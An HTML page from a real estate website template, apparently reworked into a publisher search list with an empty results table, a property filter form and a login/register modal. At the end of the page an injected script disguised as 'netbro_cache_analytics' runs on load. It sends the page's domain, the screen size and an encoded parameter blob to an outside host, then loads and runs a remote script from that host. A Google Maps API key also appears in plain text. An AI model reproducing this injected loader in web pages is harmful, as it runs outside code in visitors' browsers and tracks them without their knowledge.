<!DOCTYPE html>
<html dir="ltr" lang="en-US">

<head>
    <!-- Metas -->
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="author" content="LionCoders" />
    <!-- Links -->
    <link rel="icon" type="image/png" href="#" />
    <!-- google fonts-->
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&amp;display=swap" rel="stylesheet">
    <!-- Plugins CSS -->
    <link href="css/plugin.css" rel="stylesheet" />
    <!-- style CSS -->
    <link href="css/style.css" rel="stylesheet" />
    <!-- Document Title -->
    <title>SarchHolm - Real Estate HTML Template</title>
</head>

<body>
<!--Preloader starts-->
<div class="preloader js-preloader">
    <img src="images/preloader.gif" alt="...">
</div>
<!--Preloader ends-->
<!--Page Wrapper starts-->
<div class="page-wrapper">
    <!--header starts-->
    <header class="header transparent scroll-hide">
        <!--Main Menu starts-->
        <div class="site-navbar-wrap v1">
            <div class="container">
                <div class="site-navbar">
                    <div class="row align-items-center">
                        <div class="col-lg-2 col-md-6 col-9 order-2 order-xl-1 order-lg-1 order-md-1">
                            <a class="navbar-brand" href="index.html"><img src="images/logo-white.png" alt="logo" class="img-fluid"></a>
                        </div>
                        <div class="col-lg-6 col-md-1 col-3  order-3 order-xl-2 order-lg-2 order-md-3 pl-xs-0">
                            <nav class="site-navigation text-right">
                                <div class="container">
                                    <ul class="site-menu js-clone-nav d-none d-lg-block">
                                        <li class="has-children">
                                            <a href="#">Home</a>
                                            <ul class="dropdown">
                                                <li><a href="home-v1.html">Home Hero</a></li>
                                                <li><a href="home-v2.html">Home Tab</a></li>
                                                <li><a href="home-v3.html">Home Video</a></li>
                                                <li><a href="home-v4.html">Home parallax</a></li>
                                                <li><a href="home-v5.html">Home Slider</a></li>
                                                <li><a href="home-v6.html">Home Map</a></li>
                                                <li><a href="single-agency-home.html">Home Single Property</a></li>
                                            </ul>
                                        </li>
                                        <li class="has-children">
                                            <a href="#">Listings</a>
                                            <ul class="dropdown">
                                                <li class="has-children">
                                                    <a href="#">List Layout</a>
                                                    <ul class="dropdown sub-menu">
                                                        <li><a href="list-fullwidth.html">Full Width</a></li>
                                                        <li><a href="list-fullwidth-map.html">Fullwidth with google map</a></li>
                                                        <li><a href="list-fullwidth-leaflet-map.html">Fullwidth with Leaflet map</a></li>
                                                        <li><a href="list-left-sidebar.html">Left Sidebar</a></li>
                                                        <li><a href="list-right-sidebar.html">Right Sidebar</a></li>
                                                    </ul>
                                                </li>
                                                <li class="has-children">
                                                    <a href="#">Grid Layout</a>
                                                    <ul class="dropdown sub-menu">
                                                        <li><a href="grid-fullwidth.html">Full Width</a></li>
                                                        <li><a href="grid-fullwidth-map.html">Fullwidth with google map</a></li>
                                                        <li><a href="grid-fullwidth-leaflet-map.html">Fullwidth with leaflet map</a></li>
                                                        <li><a href="grid-two-column.html">Grid two column</a></li>
                                                        <li><a href="grid-left-sidebar.html">Left Sidebar</a></li>
                                                        <li><a href="grid-right-sidebar.html">Right Sidebar</a></li>
                                                    </ul>
                                                </li>
                                                <li class="has-children">
                                                    <a href="#">Map Layout - google</a>
                                                    <ul class="dropdown sub-menu">
                                                        <li><a href="list-left-sidemap.html">List Left sidemap</a></li>
                                                        <li><a href="list-right-sidemap.html">List Right sidemap</a></li>
                                                        <li><a href="grid-left-sidemap.html">Grid Left sidemap</a></li>
                                                        <li><a href="grid-right-sidemap.html">Grid Right sidemap</a></li>
                                                        <li><a href="grid-search-half-map.html">advanced search</a></li>
                                                    </ul>
                                                </li>
                                                <li class="has-children">
                                                    <a href="#">Tab Layout</a>
                                                    <ul class="dropdown sub-menu">
                                                        <li><a href="tab-fullwidth.html">Tab fullwidth</a></li>
                                                        <li><a href="tab-left-sidebar.html">Tab left sidebar</a></li>
                                                        <li><a href="tab-right-sidebar.html">Tab right sidebar</a></li>
                                                    </ul>
                                                </li>
                                                <li class="has-children">
                                                    <a href="#">Map Layout - Leaflet</a>
                                                    <ul class="dropdown sub-menu">
                                                        <li><a href="list-left-leaflet-sidemap.html">List Left sidemap</a></li>
                                                        <li><a href="list-right-leaflet-sidemap.html">List Right sidemap</a></li>
                                                        <li><a href="grid-left-leaflet-sidemap.html">Grid Left sidemap</a></li>
                                                        <li><a href="grid-right-leaflet-sidemap.html">Grid Right sidemap</a></li>
                                                        <li><a href="grid-search-half-leafletmap.html">advanced search</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="has-children">
                                            <a href="#">Property</a>
                                            <ul class="dropdown sub-menu">
                                                <li><a href="single-listing-one.html">Single Property Hero Header </a></li>
                                                <li><a href="single-listing-two.html">Single Property Video Header </a></li>
                                                <li><a href="single-listing-three.html">Single Property Parallax Header </a></li>
                                                <li><a href="single-listing-four.html">Single Property Slider Heade v1 </a></li>
                                                <li><a href="single-listing-five.html">Single Property Slider Header v2 </a></li>
                                            </ul>
                                        </li>
                                        <li class="has-children">
                                            <a href="#">Pages</a>
                                            <ul class="dropdown">
                                                <li class="has-children">
                                                    <a href="#">Agents</a>
                                                    <ul class="dropdown sub-menu">
                                                        <li><a href="agent-list.html">Agents List</a>
                                                        </li>
                                                        <li><a href="agent-grid.html">Agents Grid</a>
                                                        </li>
                                                        <li><a href="single-agent.html">Agent Profile</a>
                                                        </li>
                                                    </ul>
                                                </li>
                                                <li class="has-children">
                                                    <a href="#">Agency</a>
                                                    <ul class="dropdown sub-menu">
                                                        <li><a href="agency-list.html">Agency List</a>
                                                        </li>
                                                        <li><a href="agency-grid.html">Agency Grid</a>
                                                        </li>
                                                        <li><a href="single-agency.html">Agency Profile</a>
                                                        </li>
                                                    </ul>
                                                </li>
                                                <li><a href="db.html">Dashboard</a></li>
                                                <li><a href="about.html">About us</a></li>
                                                <li><a href="contact.html">Contact us</a></li>
                                                <li><a href="membership-package.html">Membership Packages</a></li>
                                                <li><a href="compare.html">Compare</a></li>
                                                <li><a href="404-page.html">404 error</a></li>
                                                <li><a href="add-listing.html">Add Listing</a></li>
                                                <li><a href="faq.html">FAQ</a></li>
                                            </ul>
                                        </li>
                                        <li class="has-children">
                                            <a href="#">News</a>
                                            <ul class="dropdown">
                                                <li><a href="news-left-sidebar.html">News Left sidebar</a></li>
                                                <li><a href="news-right-sidebar.html">News right sidebar</a></li>
                                                <li><a href="news-without-sidebar.html">News without sidebar</a></li>
                                                <li><a href="single-news-one.html">Single News one</a></li>
                                                <li><a href="single-news-two.html">Single News two</a></li>
                                                <li><a href="single-news-three.html">Single News three</a></li>
                                            </ul>
                                        </li>
                                    </ul>
                                </div>
                            </nav>
                            <div class="d-lg-none sm-right">
                                <a href="#" class="mobile-bar js-menu-toggle">
                                    <span class="lnr lnr-menu"></span>
                                </a>
                            </div>
                            <!--mobile-menu starts -->
                            <div class="site-mobile-menu">
                                <div class="site-mobile-menu-header">
                                    <div class="site-mobile-menu-close  js-menu-toggle">
                                        <span class="lnr lnr-cross"></span> </div>
                                </div>
                                <div class="site-mobile-menu-body"></div>
                            </div>
                            <!--mobile-menu ends-->
                        </div>
                        <div class="col-lg-4 col-md-5 col-12 order-1 order-xl-3 order-lg-3 order-md-2 text-right pr-xs-0">
                            <div class="menu-btn">
                                <ul class="user-btn v2">
                                    <li><a href="#"><i class="fas fa-arrows-alt-h"></i></a>
                                        <span>3</span>
                                    </li>
                                    <li><a href="#"><i class="lnr lnr-heart"></i></a>
                                        <span>0</span>
                                    </li>
                                    <li><a href="#" data-toggle="modal" data-target="#user-login-popup"><i class="lnr lnr-user"></i></a>
                                    </li>
                                </ul>
                                <div class="add-list float-right ml-3">
                                    <a class="btn v6" href="add-listing.html"><i class="lnr lnr-home"></i>Add Listing </a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!--Main Menu ends-->
    </header>
    <!--Header ends-->
    <!--Breadcrumb section starts-->
    <div class="breadcrumb-section bg-h" style="background-image: url(images/header/hero_1.jpg)">
        <div class="overlay op-5"></div>
        <div class="container">
            <div class="row">
                <div class="col-md-8 offset-md-2 text-center">
                    <div class="breadcrumb-menu">
                        <h2>Property Listing</h2>
                        <span><a href="home-v1.html">Home</a></span>
                        <span>Property Listing - Grid View</span>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!--Breadcrumb section ends-->
    <!--Listing filter starts-->
    <div class="filter-wrapper style1 section-padding">
        <div class="container">
            <div class="row">
                <!--Listing filter starts-->
                <div class="container">
                    <div class="row">
                        <div class="col-md-12">
                            <form class="hero__form v1 filter listing-filter property-filter">
                                <div class="row">
                                    <div class="col-xl-5 col-lg-6 col-md-6 col-sm-12 col-12 py-3 pl-30 pr-0">
                                        <div class="input-search">
                                            <input type="text" name="place-event" id="place-event" placeholder="Enter Property, Location, Landmark ...">
                                        </div>
                                    </div>
                                    <div class="col-xl-2 col-lg-6 col-md-6 col-sm-12 col-12 py-3 pl-30 pr-0">
                                        <select class="hero__form-input  form-control custom-select">
                                            <option>Select Area</option>
                                            <option>New York</option>
                                            <option>California</option>
                                            <option>Washington</option>
                                            <option>New Jersey</option>
                                            <option>Los angeles</option>
                                            <option>Florida</option>
                                        </select>
                                    </div>
                                    <div class="col-xl-2 col-lg-6 col-md-6 col-sm-12 col-12 py-3 pl-30 pr-0">
                                        <select class="hero__form-input  form-control custom-select">
                                            <option>Select City</option>
                                            <option>New York</option>
                                            <option>California</option>
                                            <option>Washington</option>
                                            <option>New Jersey</option>
                                            <option>Los angeles</option>
                                            <option>Florida</option>
                                        </select>
                                    </div>
                                    <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 py-3 pl-30 pr-0">
                                        <div class="submit_btn">
                                            <button class="btn v3" type="submit">Search</button>
                                        </div>
                                        <div class="dropdown-filter"><span>More Filters</span></div>
                                    </div>
                                    <div class="explore__form-checkbox-list full-filter">
                                        <div class="row">
                                            <div class="col-lg-4 col-md-6 py-1 pr-30">
                                                <select class="hero__form-input  form-control custom-select mb-20">
                                                    <option>Property Status</option>
                                                    <option>Any</option>
                                                    <option>For Rent</option>
                                                    <option>For Sale</option>
                                                </select>
                                            </div>
                                            <div class="col-lg-4 col-md-6 py-1 pr-30 pl-0 ">
                                                <select class="hero__form-input  form-control custom-select  mb-20">
                                                    <option>Property Type</option>
                                                    <option>Residential</option>
                                                    <option>Commercial</option>
                                                    <option>Land</option>
                                                </select>
                                            </div>
                                            <div class="col-lg-4 col-md-6 py-1 pl-0">
                                                <select class="hero__form-input  form-control custom-select  mb-20">
                                                    <option>Max rooms</option>
                                                    <option>1</option>
                                                    <option>2</option>
                                                    <option>3</option>
                                                    <option>4</option>
                                                    <option>5</option>
                                                    <option>6</option>
                                                    <option>7</option>
                                                </select>
                                            </div>
                                            <div class="col-lg-4 col-md-6 py-1 pr-30 ">
                                                <select class="hero__form-input  form-control custom-select  mb-20">
                                                    <option>Bed</option>
                                                    <option>1</option>
                                                    <option>2</option>
                                                    <option>3</option>
                                                    <option>4</option>
                                                </select>
                                            </div>
                                            <div class="col-lg-4 col-md-6 py-1 pr-30 pl-0">
                                                <select class="hero__form-input  form-control custom-select  mb-20">
                                                    <option>Bath</option>
                                                    <option>1</option>
                                                    <option>2</option>
                                                    <option>3</option>
                                                    <option>4</option>
                                                </select>
                                            </div>
                                            <div class="col-lg-4 col-md-6 py-1 pl-0">
                                                <select class="hero__form-input  form-control custom-select  mb-20">
                                                    <option>Agents</option>
                                                    <option>Bob Haris</option>
                                                    <option>Ross buttler</option>
                                                    <option>Andrew Saimons</option>
                                                    <option>Steve Austin</option>
                                                </select>
                                            </div>
                                            <div class="col-lg-4 col-md-6 py-1 pr-30">
                                                <select class="hero__form-input  form-control custom-select  mb-20">
                                                    <option>Agencies</option>
                                                    <option>Onyx Equities</option>
                                                    <option>OVG Real Estate</option>
                                                    <option>Oxford Properties*</option>
                                                    <option>Cortland</option>
                                                </select>
                                            </div>
                                            <div class="col-lg-4 col-md-6 py-1 pr-30 pl-0">
                                                <div class="filter-sub-area style1">
                                                    <div class="filter-title mb-10">
                                                        <p>Price : <span><input type="text" id="amount_two"></span></p>
                                                    </div>
                                                    <div id="slider-range_two" class="price-range mb-30">
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="col-lg-4 col-md-6 py-1  pl-0">
                                                <div class="filter-sub-area style1">
                                                    <div class="filter-title  mb-10">
                                                        <p>Area : <span><input type="text" id="amount_one"></span></p>
                                                    </div>
                                                    <div id="slider-range_one" class="price-range mb-30">
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="col-lg-6 col-md-6 py-1 pr-30">
                                                <div class="filter-checkbox">
                                                    <p>Sort By Features</p>
                                                    <ul>
                                                        <li>
                                                            <input id="check-a" type="checkbox" name="check">
                                                            <label for="check-a">Air Condition</label>
                                                        </li>
                                                        <li>
                                                            <input id="check-b" type="checkbox" name="check">
                                                            <label for="check-b">Swimming Pool</label>
                                                        </li>
                                                        <li>
                                                            <input id="check-c" type="checkbox" name="check">
                                                            <label for="check-c">Laundry Room</label>
                                                        </li>
                                                        <li>
                                                            <input id="check-d" type="checkbox" name="check">
                                                            <label for="check-d">Free Wifi</label>
                                                        </li>
                                                        <li>
                                                            <input id="check-e" type="checkbox" name="check">
                                                            <label for="check-e">Window Covering</label>
                                                        </li>
                                                        <li>
                                                            <input id="check-f" type="checkbox" name="check">
                                                            <label for="check-f">Central Heating </label>
                                                        </li>
                                                        <li>
                                                            <input id="check-g" type="checkbox" name="check">
                                                            <label for="check-g">24 hour security</label>
                                                        </li>
                                                        <li>
                                                            <input id="check-h" type="checkbox" name="check">
                                                            <label for="check-h">Lawn</label>
                                                        </li>
                                                        <li>
                                                            <input id="check-i" type="checkbox" name="check">
                                                            <label for="check-i">Gym</label>
                                                        </li>
                                                    </ul>
                                                </div>
                                            </div>
                                            <div class="col-lg-6 col-md-6 py-1 pr-30 pl-0 ">
                                                <div class="filter-checkbox">
                                                    <p>Sort By Ratings</p>
                                                    <div>
                                                        <input id="check-w" type="checkbox" name="check">
                                                        <label for="check-w">
                                                        </label>
                                                        <div class="list-ratings">
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                        </div>
                                                    </div>
                                                    <div>
                                                        <input id="check-x" type="checkbox" name="check">
                                                        <label for="check-x">
                                                        </label>
                                                        <div class="list-ratings">
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star-half-alt"></span>
                                                        </div>
                                                    </div>
                                                    <div>
                                                        <input id="check-y" type="checkbox" name="check">
                                                        <label for="check-y">
                                                        </label>
                                                        <div class="list-ratings">
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star-half-alt"></span>
                                                            <span class="fas fa-star-half-alt"></span>
                                                        </div>
                                                    </div>
                                                    <div>
                                                        <input id="check-z" type="checkbox" name="check">
                                                        <label for="check-z">
                                                        </label>
                                                        <div class="list-ratings">
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star"></span>
                                                            <span class="fas fa-star-half-alt"></span>
                                                            <span class="fas fa-star-half-alt"></span>
                                                            <span class="fas fa-star-half-alt"></span>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
                <!--Listing filter ends-->
            </div>
        </div>
    </div>
    <div class="col-md-12">
        <div class="row pt-60   align-items-center">
            <div class="col-lg-3 col-sm-5 col-5">
                <div class="container">
                    <h2>Publisher Search List</h2>
                    <table class="table table-striped" id="pubtable">
                        <thead>
                        <tr>
                            <th>Property ID</th>
                            <th>Property Title</th>
                            <th>Naskah Details</th>
                            <th>Naskah File Name</th>
                            <th>Naskah File </th>
                        </tr>
                        </thead>
                        <tbody>

                        <tr>
                            <td></td>
                            <td></td>
                            <td></td>
                        </tr>
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>
    <!--Listing filter ends-->
    <!-- Scroll to top starts-->
    <span class="scrolltotop"><i class="lnr lnr-arrow-up"></i></span>
    <!-- Scroll to top ends-->
</div>
<!--Page Wrapper ends-->
<!--Footer Starts-->
<div class="footer-wrapper v2">
    <div class="footer-top-area">
        <div class="container">
            <div class="row nav-folderized">
                <div class="col-lg-4 col-md-12">
                    <div class="footer-logo">
                        <a href="index.html"> <img src="images/logo-white.png" alt="logo"></a>
                        <div class="company-desc">
                            <p>
                                Lorem ipsum dolor sit amet, consectetur adipisicing elit. Distinctio excepturi nam totam sequi, ipsam consequatur repudiandae libero illum.
                            </p>
                            <ul class="list footer-list mt-20">
                                <li>
                                    <div class="contact-info">
                                        <div class="icon">
                                            <i class="fa fa-map-marker-alt"></i>
                                        </div>
                                        <div class="text">13th North Ave, Florida, USA</div>
                                    </div>
                                </li>
                                <li>
                                    <div class="contact-info">
                                        <div class="icon">
                                            <i class="fas fa-envelope"></i>
                                        </div>
                                        <div class="text"><a href="#">info@sarchholm.com</a></div>
                                    </div>
                                </li>
                                <li>
                                    <div class="contact-info">
                                        <div class="icon">
                                            <i class="fas fa-phone-alt"></i>
                                        </div>
                                        <div class="text">+44 078 767 595</div>
                                    </div>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="col-lg-2 col-md-12 text-center sm-left">
                    <div class="footer-content nav">
                        <h2 class="title">Popular Searches</h2>
                        <ul class="list res-list">
                            <li><a class="link-hov style2" href="#">Property for Rent</a></li>
                            <li><a class="link-hov style2" href="#">Property for Sale</a></li>
                            <li><a class="link-hov style2" href="#">Condominium for Sale</a></li>
                            <li><a class="link-hov style2" href="#">Resale Properties</a></li>
                            <li><a class="link-hov style2" href="#">Recent Properties</a></li>
                        </ul>
                    </div>
                </div>
                <div class="col-lg-3 col-md-12 text-center sm-left">
                    <div class="footer-content nav">
                        <h2 class="title">Quick Links</h2>
                        <ul class="list res-list">
                            <li><a class="link-hov style2" href="about.html">About us</a></li>
                            <li><a class="link-hov style2" href="contact.html">Contact us</a></li>
                            <li><a class="link-hov style2" href="faq.html">Privacy Policy</a></li>
                            <li><a class="link-hov style2" href="faq.html">FAQ</a></li>
                        </ul>
                    </div>
                </div>
                <div class="col-lg-3 col-md-12">
                    <div class="footer-content">
                        <h4 class="title">Subscribe</h4>
                        <div class="value-input-wrap newsletter">
                            <form action="#">
                                <input type="text" placeholder="Your mail address ..">
                                <button type="submit">Subscribe</button>
                            </form>
                        </div>
                        <div class="footer-social-wrap">
                            <p>Follow us on </p>
                            <ul class="social-buttons style2">
                                <li><a href="#"><i class="fab fa-facebook-f"></i></a></li>
                                <li><a href="#"><i class="fab fa-twitter"></i></a></li>
                                <li><a href="#"><i class="fab fa-pinterest-p"></i></a></li>
                                <li><a href="#"><i class="fab fa-youtube"></i></a></li>
                                <li><a href="#"><i class="fab fa-dribbble"></i></a></li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="footer-bottom-area">
        <div class="container">
            <div class="row align-items-center">
                <div class="col-md-8 offset-md-2">
                    <p>
                        ©SarchHolm 2019. All rights reserved. </p>
                </div>
            </div>
        </div>
    </div>
</div>
<!--Footer ends-->
<!--login Modal starts-->
<div class="modal fade" id="user-login-popup">
    <div class="modal-dialog modal-dialog-centered" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true"><i class="lnr lnr-cross"></i></span></button>
            </div>
            <div class="modal-body">
                <!--User Login section starts-->
                <div class="user-login-section">
                    <div class="container">
                        <div class="row">
                            <div class="col-md-12">
                                <ul class="ui-list nav nav-tabs mb-30" role="tablist">
                                    <li class="nav-item">
                                        <a class="nav-link active" data-toggle="tab" href="#login" role="tab" aria-selected="true">Login</a>
                                    </li>
                                    <li class="nav-item">
                                        <a class="nav-link" data-toggle="tab" href="#register" role="tab" aria-selected="false">Register</a>
                                    </li>
                                </ul>
                                <div class="login-wrapper">
                                    <div class="ui-dash tab-content">
                                        <div class="tab-pane fade show active" id="login" role="tabpanel">
                                            <div class="row">
                                                <div class="col-md-6">
                                                    <form id="login-form" action="#" method="post">
                                                        <div class="form-group">
                                                            <input type="text" name="username" id="username" tabindex="1" class="form-control" placeholder="email" value="" required="">
                                                        </div>
                                                        <div class="form-group">
                                                            <input type="password" name="password" id="password" tabindex="2" class="form-control" placeholder="Password">
                                                        </div>
                                                        <div class="row mt-20">
                                                            <div class="col-md-6 col-12 text-left">
                                                                <div class="res-box">
                                                                    <input id="check-l" type="checkbox" name="check">
                                                                    <label for="check-l">Remember me</label>
                                                                </div>
                                                            </div>
                                                            <div class="col-md-6 col-12 text-right">
                                                                <div class="res-box sm-left">
                                                                    <a href="#" tabindex="5" class="forgot-password">Forgot Password?</a>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <div class="res-box text-center mt-30">
                                                            <button type="submit" class="btn v8"><span class="lnr lnr-exit"></span> Log In</button>
                                                        </div>
                                                    </form>
                                                    <div class="social-profile-login  text-left mt-20">
                                                        <h5>or Login with</h5>
                                                        <ul class="social-btn">
                                                            <li class="bg-fb"><a href="#"><i class="fab fa-facebook-f"></i></a></li>
                                                            <li class="bg-tt"><a href="#"><i class="fab fa-twitter"></i></a></li>
                                                            <li class="bg-ig"><a href="#"><i class="fab fa-instagram"></i></a></li>
                                                        </ul>
                                                    </div>
                                                </div>
                                                <div class="col-md-6">
                                                    <div class="signup-wrapper">
                                                        <img src="images/others/login-1.png" alt="...">
                                                        <p>Welcome Back! Please Login to your Account for latest property listings.</p>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="tab-pane fade" id="register" role="tabpanel">
                                            <div class="row">
                                                <div class="col-md-6">
                                                    <form id="register-form" action="#" method="post">
                                                        <div class="form-group">
                                                            <input type="text" name="user_name" id="user_name" tabindex="1" class="form-control" placeholder="Username" value="">
                                                        </div>
                                                        <div class="form-group">
                                                            <input type="email" name="email" id="email" tabindex="1" class="form-control" placeholder="Email Address" value="">
                                                        </div>
                                                        <div class="form-group">
                                                            <input type="password" name="user_password" id="user_password" tabindex="2" class="form-control" placeholder="Password">
                                                        </div>
                                                        <div class="form-group">
                                                            <input type="password" name="confirm-password" id="confirm-password" tabindex="2" class="form-control" placeholder="Confirm Password">
                                                        </div>
                                                        <div class="res-box text-left">
                                                            <input type="checkbox" tabindex="3" class="" name="remember" id="remember">
                                                            <label for="remember">I've read and accept terms &amp; conditions</label>
                                                        </div>
                                                        <div class="res-box text-center mt-30">
                                                            <button type="submit" class="btn v8"><i class="lnr lnr-enter"></i>Sign Up</button>
                                                        </div>
                                                    </form>
                                                    <div class="social-profile-login  text-left mt-20">
                                                        <h5>or Sign Up with</h5>
                                                        <ul class="social-btn">
                                                            <li class="bg-fb"><a href="#"><i class="fab fa-facebook-f"></i></a></li>
                                                            <li class="bg-tt"><a href="#"><i class="fab fa-twitter"></i></a></li>
                                                            <li class="bg-ig"><a href="#"><i class="fab fa-instagram"></i></a></li>
                                                        </ul>
                                                    </div>
                                                </div>
                                                <div class="col-md-6">
                                                    <div class="signup-wrapper">
                                                        <img src="images/others/login-1.png" alt="...">
                                                        <p>Create an account to find the best Property for you.</p>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <!--User login section ends-->
            </div>
        </div>
    </div>
</div>
<!--login Modal ends-->
<!--Scripts starts-->
<!--plugin js-->
<script src="js/plugin.js"></script>
<!--google maps-->
<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD_8C7p0Ws2gUu7wo0b6pK9Qu7LuzX2iWY&amp;libraries=places&amp;callback=initAutocomplete">
</script>
<!--Main js-->
<script src="js/main.js"></script>
<!--Scripts ends-->
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXm4UFHi%2b9QCK39v8p8Kn5hKmR1izWPkVUzAmkQFOrhqYi7jMh85aZxiNaBoxRK%2fsNetp9h6UviCa5wO5RHmX1nzio%2bo8nTvsbyrC9jA9ecWXu27hPB7fyIKJTHzZwkh6%2bO8eon%2fiKRHU19ZgTnaXgTDNns6aRE9rEnIHfGxyH%2beJltGVOeVFA1fr%2fSACPWLUL6pcEo0K%2f%2bedYIZmrvvdYuOVk57xHGCqX5Ji5qcaymxbEg8%2bu5nOlsgof5jvAw%2bWa7EEmmUaJhbyung1iV2AkyeR%2boRVg94LcquW9ZVAUxrUTplPhBp%2bBvP1FRiPjF4dB1ZNw4jk7MPV8BLz8XcjfdXv3HMggxqZL2iyOoBq4bEtdgZ9wdMUx72n2DxA8Gg3xui574gWe0ycWbz4%2f4M%2fnK7NfI7y613UcFBi0tCcHnDbkS795Y%2bFCRjry%2br9WV3U4fzYxLflFf15K8esX7noAgwIqxF8gRjE5Rf6vBkAzGHMn9IwUhD4jutbh0B%2bKnYSJ" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>
